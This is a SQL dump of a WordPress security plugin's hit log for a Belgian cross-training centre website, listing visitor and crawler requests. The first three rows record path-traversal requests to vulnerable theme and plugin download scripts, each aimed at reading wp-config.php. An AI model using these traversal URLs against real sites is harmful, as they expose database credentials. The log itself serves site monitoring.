(72174, 1494407200.702125, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72175, 1494407451.901292, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72176, 1494407943.259426, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72177, 1494412841.679724, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72178, 1494414471.670918, 1464066970, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72179, 1494414472.146893, 1464066970, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72180, 1494414472.559693, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72181, 1494414472.953098, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72182, 1494414473.364105, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72183, 1494414473.829572, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72184, 1494414474.302817, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72185, 1494414474.844366, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72186, 1494414475.357838, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72187, 1494414475.784186, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72188, 1494414476.268664, 1464066970, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72189, 1494417393.088220, 3475901715, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(72190, 1494417742.679660, 676177839, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72191, 1494417749.737942, 3475901715, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72192, 1494419316.242581, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72193, 1494419316.851030, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72194, 1494419317.383281, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72195, 1494419317.797316, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72196, 1494419318.243961, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72197, 1494419318.752208, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72198, 1494419319.444152, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72199, 1494419319.972617, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72200, 1494419320.439714, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72201, 1494419320.893451, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72202, 1494419321.419698, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72203, 1494420724.646936, 3475901859, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72204, 1494422848.130687, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72205, 1494422848.566077, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72206, 1494422848.971270, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72207, 1494422849.379686, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72208, 1494422849.936783, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72209, 1494422850.347777, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72210, 1494422850.741540, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72211, 1494422851.317292, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72212, 1494422851.740074, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72213, 1494422852.461321, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72214, 1494422852.870437, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72215, 1494422853.330106, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72216, 1494422853.737129, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72217, 1494422854.159611, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72218, 1494430163.284534, 2509962560, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(72219, 1494434245.268475, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72220, 1494434245.722611, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72221, 1494434246.208985, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72222, 1494434246.616103, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72223, 1494434247.883809, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72224, 1494434248.585475, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72225, 1494434249.853572, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72226, 1494434250.539518, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72227, 1494434251.696519, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72228, 1494434252.170971, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72229, 1494434252.592046, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72230, 1494434253.064226, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72231, 1494434253.470131, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72232, 1494434253.869937, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72233, 1494434807.002857, 2996485390, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(72234, 1494441279.614980, 1357699146, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-J500FN Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(72235, 1494441281.574026, 1357699146, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-J500FN Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(72236, 1494446098.092394, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72237, 1494446098.558729, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72238, 1494446098.995717, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72239, 1494446099.439433, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72240, 1494446100.149821, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72241, 1494446100.600406, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72242, 1494446101.023991, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72243, 1494446101.598690, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72244, 1494446102.115313, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72245, 1494446102.581661, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72246, 1494446103.087411, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72247, 1494446103.706933, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72248, 1494446104.117708, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72249, 1494446104.546057, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72250, 1494447410.581438, 2919226301, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(72251, 1494448820.935834, 1838094426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72252, 1494448821.490924, 1838094426, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72253, 1494448821.951247, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72254, 1494448822.423402, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72255, 1494448822.876957, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72256, 1494448823.315491, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72257, 1494448823.957893, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72258, 1494448824.437241, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72259, 1494448824.928676, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72260, 1494448825.389114, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72261, 1494448825.833034, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72262, 1494448944.168583, 1838094426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72263, 1494448944.694785, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72264, 1494448945.158716, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72265, 1494448945.608370, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72266, 1494448946.065012, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72267, 1494448946.577456, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72268, 1494448947.150742, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72269, 1494448947.605953, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72270, 1494448948.072535, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72271, 1494448948.503046, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72272, 1494448948.953975, 1838094426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72273, 1494448955.957786, 1389669355, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(72274, 1494448981.505341, 1389669355, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(72275, 1494449052.296168, 1389669355, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(72276, 1494457281.340719, 1837842937, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72277, 1494457308.605578, 1837842937, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72278, 1494461059.076773, 2637637390, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72279, 1494466233.186325, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-homepage-slideshow/readme.txt', 'http://crosstrainingcenter.be/wp-content/plugins/wp-homepage-slideshow/readme.txt', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(72280, 1494476968.831442, 1338304137, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72281, 1494479253.546687, 1152705948, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(72282, 1494479300.758329, 1152705948, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(72283, 1494479987.151791, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72284, 1494479987.671507, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72285, 1494479988.124105, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72286, 1494479988.570344, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72287, 1494479988.986040, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72288, 1494479989.497478, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72289, 1494479990.008067, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72290, 1494479990.574243, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72291, 1494479991.101063, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72292, 1494479991.582393, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72293, 1494479992.094340, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72294, 1494481315.808457, 676177749, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72295, 1494481316.364055, 676177749, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72296, 1494483151.508925, 1538358342, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
